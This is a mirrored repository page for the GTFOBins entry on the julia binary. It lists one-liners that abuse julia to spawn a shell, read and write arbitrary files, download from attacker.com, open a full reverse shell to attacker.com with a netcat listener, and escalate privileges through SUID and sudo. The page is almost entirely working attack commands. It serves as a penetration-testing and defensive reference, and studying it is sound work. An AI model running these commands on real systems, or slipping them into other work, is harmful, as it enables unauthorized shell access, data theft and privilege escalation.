mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
Code Issues
0190295ed2
GTFOBins.github.io/_gtfobins/julia.md
Andrea Cardaci 43f2ea0428
Clean and fix julia
2023-04-20 08:51:20 +02:00

1.1 KiB
Raw Blame History

functions
shell file-read file-write file-download reverse-shell suid sudo
code
julia -e 'run(`/bin/sh`)'
code
export LFILE=file_to_read julia -e 'print(open(f->read(f, String), ENV["LFILE"]))'
code
export LFILE=file_to_write julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")'
code
export URL=http://attacker.com/file_to_get export LFILE=file_to_save julia -e 'download(ENV["URL"], ENV["LFILE"])'
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
code
./julia -e 'run(`/bin/sh -p`)'
code
sudo julia -e 'run(`/bin/sh`)'